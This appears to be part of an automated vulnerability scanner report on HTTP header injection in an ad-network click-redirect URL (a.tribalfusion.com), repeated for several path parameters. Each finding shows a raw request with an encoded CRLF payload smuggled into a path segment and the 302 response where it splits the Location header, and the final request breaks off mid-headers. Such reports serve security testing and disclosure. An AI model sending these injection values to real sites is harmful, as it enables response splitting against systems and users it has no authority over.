Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 12 is copied into the Location response header. The payload d803e%0d%0a85430c945da was submitted in the REST URL parameter 12. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/d803e%0d%0a85430c945da/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aKnFcixNeTm7eZdw4MeTOFH29rTPr7r6WmouMgZcMeWMTM7pZbTImUPMFxHiYt9TpjV8WCw6YxHwcXe8oyQerrRUOxd8kZcWRgHuo4OCRZcV2ZbKK0GLNSBQC0tb9Q5KlhpCvyAxZauJ1feSBWVFit6ZalZaymHbvELW0Kpsn0SDY4HWp6rMaqZcnKuABg2esd4k22m3tnOmo9OTiDyKYcWIVCotNO38jZcU9TxNlS7HK1SaDMvrd5B6oW8Zbv4ZcH5JhZbAmLlNpBDGHQ25dvBkXydj443pq0DIr0Mbs8Kd6toYidvcZb1HHyCBpZb5C6xetR2hnydtIZddfD3KQWcMJHh94tp23qCHmqHj1jYZb0pt6GYNHKkDZawyJAaYZaWZc8uqERBZcKrm0RR5slUFAEUtE8iv3ql7Zd2Za7TWEgKkeZcUFXYJ529mrfR71P0THBIl4OWhcjkRTlvhLaCdqwwOFuVSGR69pE3AxuKotlESZcHfxa5ahqZcsVF5cIrMZbRkSvOdh2tBrpDs1Yw8QgQBQBke2bujM0GdMSPdRg2tHDKyjg5UDlaUEggsgBImsZbulRcSoI89Nr5NJnpTpniETFjCFG33c; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:16 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/d803e
85430c945da/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 13 is copied into the Location response header. The payload 1e26f%0d%0a98d0c7685b was submitted in the REST URL parameter 13. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/1e26f%0d%0a98d0c7685b/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aCnFciO5nPuBPRokUUrOvKVAnOUHaTCPu54jkhQg4Zdv4XjIWPMVt7Za1qyQnUqkGWOMZahIDRsgV2eNZbmmjGmtMcNsGiJGVAcwsPq64IYujFJuRwu8jAcNcWaqHLgZapPUhaFdff7gIcwUoJTr7QxH0AiDg2j3Zac1wm0XZag0cxCFStF2hn1A7HNyvrrgM3ZdFYqBLfNC9pacvCrt88V9WHseTW8XjH0hK8MQRJUSqeTxAxYquIRmTkXZbHOLXnnqi91VSW6CnTn9XXgP25mVkrZcU0OFOvvZcpPZdGCmwqKtMD7YZcrQ7ujI20juZde1Me7q7BeRZae4tEAOyTuW1d4hZaPynnCU24eKJ1KLqbBE3mZae8FD42GDGZbMQOZcfP6DpJljn5rRZb0unxhUrZbHCYC5P9YZb3Qr5nqBiMme5SqnF42eOGjpZbgry4cfjlZdHsjoZbOQG1ggXQGaEZc9paan19WeZd8ntA03ww6cn2XOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNF3ZdqSFdhITLyZaa4ZcHFZcXWwWMtxZcA5fB0dGZcGRZaHZackaaoOOUZahuVnPl6YfV4w7xRLg7lRXHvpGa2a; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:36 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/1e26f
98d0c7685b/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 14 is copied into the Location response header. The payload 2c6a9%0d%0a7020e2fed79 was submitted in the REST URL parameter 14. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/2c6a9%0d%0a7020e2fed79/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aVnFcipyXanFqiV3EGmyfa3pJS2dFZcKpjZc14Cv0wOd5ZcbF6Vfr0FnMSsZa7mneZbgTGSeea6ScVQPw0s0TmwSTUQYaksCrRsLuWUxrRmnJZbMZcgkEO6JEZai8kZaUhy84LTpkyKBlfZdILg8YPJIv7qmDjARaO20YyZcTxDRZbC2ZdjTGnbwmaMxJyPKf2jTVS4SJJMwApsnSScb67SxQcF1Q5YtjFM7jyW3O0QtRVY4PqjsKZbLV7Be5BXe1MhZbCxieV1RV1AwZcL9Zaklxn4YXxZco3a3PYlhqKB8wmk2KSlbZdEQQgJl3tnFF639bqMugmgQE6bqn6hdY6DS5Ueh2hZaZdtwXiZb7sqfZdX7BBuoSiVyrDMkMhlyNETnDVMgjwoHK7ZcBGWdgJyMfqZbSr9bBU0So9FB3qN1GqOLem5192NEjTMnmuu8kBKSSQxb3xH6bjhmb8Ja438gFsyyrTa0bZdvBErPZbeUaxbt15jk3o6x0ZdH5bSGZdIDGF71Zco9tENZbooY7Icwn2oiCvAeJ80ZaTmlZbgHD7myahEuqh6LiQjSHdTZcnYVJUCsl84Wp2VPNmfdihvdVuQLSkWKDPBfgLGYSw; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:41 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/2c6a9
7020e2fed79/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 15 is copied into the Location response header. The payload 52493%0d%0a224473ccc99 was submitted in the REST URL parameter 15. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/52493%0d%0a224473ccc99/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aDnFcirwZayOnXwr2QHr2jw47YFSRv4Za7XcQkGt15RZcWf7wADFEVHJyPbI34C71hPcXHKqC4rKUR10ZauE2JtrnsNVwlCTDlBxKRo78YQefyFwV2spqhEjwpgWtM7ZckpUZavxZc16eEegyYmnvsceCgM7VcIeC3lclwDGjZaIWgXprAOFXanfuu6LZaVrawRUjZbXw8LuxQxYCR7vmqs41nd2RXQiZbZcBUuZa47yCRWRpFVw2bZdt72UUAP4UZbLEGur8We5t47W7BBXlfMbGWiWXQ2n2UvhrtXQqrFRZaZaB0ZbFqU5hiCqOVBwAIZdTuOChrvUuZcVMd7lHRZd7DMXxtXfjZdZbXIANFWPZcegrXBY9gcb7oKf4TLZcXOZdEJ15kWCop5WHZa3HTtZdk05iFCdyEf8UESR1qZc0eZaoVUxJ5EH5mqFFjA3Oa6Ok1FlVcj8lMOlKHMPQWLF8wYHgdZcosty1MWZdSK7bLZbIj74P9KpZcS5WSOgEW1h5bNpZdPjbwZcl4MFsxyCveZab9x3B79y7FceuXUsfYoJtZbc5bNFMTlNINBx2o1EI9iNDbGukHpNxxRl4bFV6fBcUhUtM0SqCpQ89HGyxv; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:14 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/52493
224473ccc99/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 16 is copied into the Location response header. The payload 2b2bd%0d%0ad6cedd4809c was submitted in the REST URL parameter 16. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/2b2bd%0d%0ad6cedd4809c/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnFcim5abw6yuoZbUjT4fqUDUD2sYQZdDZaWW5gcOxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4mr6MsaUrZcq3FYXmmEoyQZaT2oCpbp7Sa9R3qwWor4D8Mm5YBh4FmTZcWSQ7hJWm31vxvGWRZa3SsmDNZaVkIf3uNYZdH07L4Zb632iXZb5RMp0VZbrsqxlxyw3ow7oDZd9ZcyDFvZcZdISGupYxFlZdGTecU4IrCZbsI29LLgZb64fS3HpZdNWhR4iVJVPFdYnvjeG2iEJWKucrZb0ukZaVMI4M8GnDhZcLjB62RKcsZcYlCGYq7r2n2E9PAK2B2cAuH5TisoBYDXXdwsveeXFZdTUQSh0pKlUfsTtDhc1AD8HslNHTc2Wp4AC76IweAyWhdU4WwxQsXfq8r0ccNZatni0MOVxpVcWDaCCqL7qmnSu7YYaY3cpZanhZacfaXqwl2VhmD2ZbMSVxLLBuZdFTgfK98Zay4Kk1CFEZaNbXNwrZbNqZdNAS30LbGEPp; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:30 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/2b2bd
d6cedd4809c/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 17 is copied into the Location response header. The payload 99dde%0d%0a3eec990608a was submitted in the REST URL parameter 17. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/99dde%0d%0a3eec990608a/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=agnFciSkTso6utoOjqphY1URFiTTQPB6ZaGRZaoZaYZd1HUZdjHIsrZb46evT8ErOFA9edgNChXexq5K03ctr8qQsqMGyFw3Zb70bDe8snAVc3YqBBXgdmRFMHN00kWD6lNsntiieBvjEGKlIuQmKm8JsEM2b9YZab1wGGQnHoCxoyRpU9pFATMwFRC1T6maZcO04BpUDZddr6lrhCYZbsUsSPRxVRZaFbbMrG5ZaKmQGstNCTRW1rA1PqmPnJwShtTjLfWNwZdp0RWhZbCPPZdfMZa0MtUVOZblSZc5TyhZb3oDwCBAZcjGV7afyLMMmZbHIMO3mX6NsZcYPlQ258XLqKAlWMw8H7hpsUkecEV2NgvrgZciv2aGJVJIghHOFCLcr6YZdcTn6ONDZaf00HWiuOvVZbFnehAPmop0HI4Ju2VeIZaZc66YbTik5BCnWFfa1bZa0crR9kCFeWbcTWOejJUiFGKjuGetTHtdZaAbGGhnh4EtD1MdZamShxfSOLpTlt8WMgVOHxuql5waFudVOZcqSnduRFiaxPgPMBuEcjhXGCsx915DZb3R1qpKF8u4AHoDiWwtv34RVPr5eZc69QiY52PMUBZajEaMGeY6; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:49 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/99dde
3eec990608a/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 18 is copied into the Location response header. The payload 10f5a%0d%0a7f475f239a3 was submitted in the REST URL parameter 18. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/10f5a%0d%0a7f475f239a3/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
